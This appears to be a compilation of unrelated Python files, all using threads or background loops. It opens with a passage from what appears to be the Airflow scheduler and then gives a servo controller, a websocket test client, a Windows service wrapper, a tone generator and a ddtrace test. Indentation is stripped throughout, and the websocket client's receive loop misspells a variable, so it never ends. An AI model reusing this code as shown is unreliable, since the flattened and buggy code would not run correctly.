# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so where we can avoid loading the full
# serialized DAG the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(
self,
task_instances: List[TI]
) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
ti.key, priority, queue
)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instance with state changed.
"""
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = "Executor reports task instance %s finished (%s) although the " \
"task says its %s. (Info: %s) Was the task killed externally?"
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.adopt_or_reset_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_ids=dag_ids,
callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
for loop_count in itertools.count(start=1):
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(self._processor_poll_interval)
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs, loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d "
" scheduler loops",
self.num_times_parse_dags, loop_count,
)
break
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
dag_runs = DagRun.next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# TODO[HA]: Why is this on TI, not on DagRun??
currently_active_runs = dict(session.query(
TI.dag_id,
func.count(TI.execution_date.distinct()),
).filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished))
).group_by(TI.dag_id).all())
for dag_run in dag_runs:
self._schedule_dag_run(dag_run, currently_active_runs.get(dag_run.dag_id, 0), session)
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
# TODO[HA]: Do we need to do it every time?
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY],
new_state=State.FAILED,
session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE,
State.SENSING],
new_state=State.NONE,
session=session
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(session.query(DagRun.dag_id, func.count('*')).filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
).group_by(DagRun.dag_id).all())
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id, active_runs_of_dag, dag.max_active_runs
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = \
dag.next_dagrun_info(dag_model.next_dagrun)
def _schedule_dag_run(self, dag_run: DagRun, currently_active_runs: int, session: Session) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error(
"Couldn't find dag %s in DagBag/DB!", dag_run.dag_id
)
return 0
if (
dag_run.start_date and dag.dagrun_timeout and
dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out'
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
dag_run.execution_date
)
return 0
if dag.max_active_runs:
if currently_active_runs >= dag.max_active_runs:
self.log.info(
"DAG %s already has %d active runs, not queuing any more tasks",
dag.dag_id,
currently_active_runs,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# Get list of TIs that do not need to executed, these are
# tasks using DummyOperator and without on_execute_callback / on_success_callback
dummy_tis = [
ti for ti in schedulable_tis
if
(
ti.task.task_type == "DummyOperator"
and not ti.task.on_execute_callback
and not ti.task.on_success_callback
)
]
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
count = session.query(TI).filter(
TI.dag_id == dag_run.dag_id,
TI.execution_date == dag_run.execution_date,
TI.task_id.in_(ti.task_id for ti in schedulable_tis if ti not in dummy_tis)
).update({TI.state: State.SCHEDULED}, synchronize_session=False)
# Tasks using DummyOperator should not be executed, mark them as success
if dummy_tis:
session.query(TI).filter(
TI.dag_id == dag_run.dag_id,
TI.execution_date == dag_run.execution_date,
TI.task_id.in_(ti.task_id for ti in dummy_tis)
).update({
TI.state: State.SUCCESS,
TI.start_date: timezone.utcnow(),
TI.end_date: timezone.utcnow(),
TI.duration: 0
}, synchronize_session=False)
return count
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self,
dag_run: DagRun,
callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc,
dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = session.query(SchedulerJob).filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout))
).update({"state": State.FAILED})
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI).filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info("Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset), task_instance_str)
# Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
# decide when to commit
session.flush()
return len(to_reset)
|
PWMServoClass.py
|
#!/usr/bin/python3
# encoding: utf-8
# Copyright HiWonder.hk
# Further development by ians.moyes@gmail.com
# Translation by Google
# Class to control the PWM Servo
import threading # Standard multi-tasking library
import time # Standard date & time library
class PWM_Servo(object): # Class to define & control a PWM Servo
# PWM servo parameters
servo_type = "generic" # Manufacturer/model of the servo
rotate_limits = (500, 2500) # Miminum & maximum number of pulses for full defection
time_limits = (20, 5000) # Minimum & maximum time to reach destination
offset_limits = (-300, 300) # Minimum & maximum offset values
PWMfreq = 50 # PWM frequency
stepTime = 20 # Time for a iteration step, in milliseconds
default_pos = 1500 # The default position for straight ahead
def __init__(self, pi, pin, freq=PWMfreq, min_width=rotate_limits[0], max_width=rotate_limits[1], offset=0, control_speed=False):
self.pi = pi # Attach the servo to the Raspberry Pi
self.SPin = pin # Channel to control servo. The GPIO pin in our case
self.Position = PWM_Servo.default_pos # The current position, firstly the straight-ahead position
self.positionSet = self.Position # The next position to move to
self.Freq = freq # The PWM carrier frequency
self.Min = min_width # Minimum PWM pulses for full deflection
self.Max = max_width # Maximum PWM pulses for full deflection
self.Offset = offset # Calibration offset
self.Mintime = PWM_Servo.time_limits[0] # Minimum time to destination
self.Maxtime = PWM_Servo.time_limits[1] # Maximum time to destination
self.stepTime = PWM_Servo.stepTime # Time for a iteration step, in milliseconds
self.positionInc = 0.0 # How many pulses to move in a step
self.Time = 0 # Time duration of the movement
self.incTimes = 1 # How many time steps to reach destination
self.prev = time.time() # Placeholder for pause time stamp
self.speedControl = False # Whether speed control is required
self.pi.set_PWM_range(self.SPin, int(1000000 / self.Freq)) # Range of values for duty cycle
self.pi.set_PWM_frequency(self.SPin, self.Freq) # Set PWM carrier frequency
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Initialise position
if self.speedControl is True: # If speed control is required start a multi-tasking thread
t1 = threading.Thread(target=PWM_Servo.updatePosition, args=(self,))
t1.setDaemon(True)
t1.start()
def setPosition(self, pos, tim=0): # Move the servo
if pos < self.Min or pos > self.Max: # Validate the position value
print("Invalid position value " + str(pos))
return "pos"
self.positionSet = pos # Set the next position flag
if not self.speedControl: tim = 0 # If speed control is not required
if tim == 0:
self.Position = pos # Update the current position
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Move the servo
else:
if tim < self.Mintime: # Don't change to max/min, this is faster
self.Time = self.Mintime # Clamp the time to the limits
elif tim > self.Maxtime:
self.Time = self.Maxtime
else:
self.Time = tim
# The multi-tasking thread will pick up that the current position doesn't match the
# desired position & activate
return True
def updatePosition(self): # This is the code for the multi-tasking thread
while True: # If speed control is required
if self.Position != self.positionSet: # If the desired position is not the current position
self.incTimes = int(self.Time / self.stepTime)
if self.incTimes == 0: self.incTimes = 1
# The number of steps is time-to-destination / time-for-a-step
self.positionInc = int((self.positionSet - self.Position) / self.incTimes)
# Pulses per step
for i in range (self.incTimes): # Loop to add a step increment each iteration
self.prev = time.time() # To the current position
self.Position += self.positionInc
self.pi.set_PWM_dutycycle(self.SPin, self.Position + self.Offset) # Move the servo
time.sleep(max(0, 0.02 - (time.time() - self.prev))) # Work out the pause
self.Time = self.Mintime # Set the duration to the minimum to mop up the error
if __name__ == '__main__':
import pigpio # Standard Raspberry Pi GPIO library
pi = pigpio.pi() # Create a Raspberry Pi object
pan = PWM_Servo(pi, 5, min_width=800, max_width=2200, offset=0) #, control_speed=True)
tilt = PWM_Servo(pi, 6, min_width=1200, max_width=2000, offset=0) # , control_speed=True)
tilt.setPosition(tilt.default_pos)
pan.setPosition(pan.default_pos)
print("Middle Middle")
time.sleep(1)
tilt.setPosition(tilt.Min, 500) # Full down
print("Middle Down")
time.sleep(1)
tilt.setPosition(tilt.Max, 500) # Full up
print("Middle Up")
time.sleep(1)
tilt.setPosition(tilt.default_pos, 500)
print("Middle Middle")
time.sleep(1)
pan.setPosition(pan.Min, 500) # Full right
print("Right Middle")
time.sleep(1)
pan.setPosition(pan.Max, 500) # Full left
print("Left Middle")
time.sleep(1)
print("Middle Middle")
pan.setPosition(pan.default_pos, 500)
|
test.py
|
#!/usr/bin/env python3
import time
import threading
def looper():
counter = 0
while True:
counter += 1
print(f'loop: {counter}')
time.sleep(1)
loop = threading.Thread(target=looper)
loop.start()
import asyncio
import websockets
import json
async def recv_event(socket, event_type):
response_type = None
while response_type != event_type:
response = await socket.recv()
respone_type = response["type"]
return response
async def test():
async with websockets.connect("ws://localhost:8001") as websocket:
await websocket.send(json.dumps({
"type": "join",
"username": input('Username: ')
}))
response = json.loads(await websocket.recv())
uid = response["uid"]
is_host = response["host"]
while True:
if is_host:
choice = input("action? (0 see players, 1 start) ")
if choice == "0":
await websocket.send(json.dumps({
"type": "list"
}))
response = json.loads(await websocket.recv())
[print(player) for player in response["data"]]
else:
event = json.loads(await websocket.recv())
if event["type"] == "joined":
print(f"New player joined: {event['username']}")
main = threading.Thread(target=lambda: asyncio.run(test()))
main.start()
loop.join()
main.join()
|
svc.py
|
# -*- coding: utf-8 -*-
import sys
from SimpleXMLRPCServer import SimpleXMLRPCServer
import win32serviceutil
import win32service
import win32event
import threading
from silvercomics import ComicsApp
from flup.server.fcgi import WSGIServer
def runserver():
while True:
try:
ComicsApp.run(port=9000)
# WSGIServer(ComicsApp()).run()
except:
pass
class SilverComicsWebService(win32serviceutil.ServiceFramework):
_svc_name_ = "SilverComicsService"
_svc_display_name_ = "Silver Age Comics Web Service"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
# Create an event which we will use to wait on.
# The "service stop" request will set this event.
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
# Before we do anything, tell the SCM we are starting the stop process.
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# And set my event.
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
# We do nothing other than wait to be stopped!
server = threading.Thread(target = runserver, name="silvercomicsservice")
server.daemon = True
server.start()
win32event.WaitForSingleObject(self.hWaitStop, win32event.INFINITE)
if __name__=='__main__':
win32serviceutil.HandleCommandLine(SilverComicsWebService)
|
tonegenerator_multithreading.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
import time
import queue
from softtone import SofttoneGenerator
class ToneGeneratorThread(object):
def __init__(self):
self.queue = queue.Queue()
self.generator = SofttoneGenerator()
self.thread = threading.Thread(name='ToneGenerator', target=self.run, daemon=True)
self.thread.start()
def _add(self, item):
self.queue.put(item)
def run(self):
while True:
if not self.queue.empty():
item = self.queue.get_nowait()
meth = getattr(self.generator, item)
meth()
time.sleep(0.2)
def confirm(self):
self._add("confirm")
def abort(self):
self._add("abort")
def ready(self):
self._add("ready")
|
test_integration.py
|
import mock
import os
import subprocess
import sys
import pytest
from ddtrace.vendor import six
import ddtrace
from ddtrace import Tracer, tracer
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.runtime import container
from tests import TracerTestCase, snapshot, AnyInt, override_global_config
AGENT_VERSION = os.environ.get("AGENT_VERSION")
def test_configure_keeps_api_hostname_and_port():
"""
Ensures that when calling configure without specifying hostname and port,
previous overrides have been kept.
"""
tracer = Tracer()
assert tracer.writer._hostname == "localhost"
assert tracer.writer._port == 8126
tracer.configure(hostname="127.0.0.1", port=8127)
assert tracer.writer._hostname == "127.0.0.1"
assert tracer.writer._port == 8127
tracer.configure(priority_sampling=True)
assert tracer.writer._hostname == "127.0.0.1"
assert tracer.writer._port == 8127
